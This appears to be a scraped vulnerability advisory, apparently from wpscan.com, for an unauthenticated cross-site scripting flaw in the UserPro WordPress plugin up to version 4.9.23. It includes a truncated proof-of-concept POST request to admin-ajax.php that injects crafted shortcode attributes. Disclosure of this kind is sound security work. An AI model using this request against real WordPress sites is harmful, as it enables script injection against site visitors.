UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)

2018-08-3100:00:00

Yonatan_correa

wpscan.com

EPSS

0.002

Percentile

57.2%

JSON

An XSS vulnerability that affects from version 2.13 to 4.9.23.

PoC

POST /wp-admin/admin-ajax.php Host: domain.com action=userpro_shortcode_template&shortcode;=[userpro id=1 layout=“float” collage_per_page=“20” emd_paginate_top=“1” emd_paginate=“1” emd_gender="Gender,radi

References

codecanyon.net/item/userpro-user-profiles-with-social-login/5958681

risataim.blogspot.com/2018/09/xss-en-plugin-userpro-de-wordpress.html

userproplugin.com/

EPSS

0.002

Percentile

57.2%

JSON

Related for WPVDB-ID:801284F4-A15F-409B-A0FE-2B06E5E184C8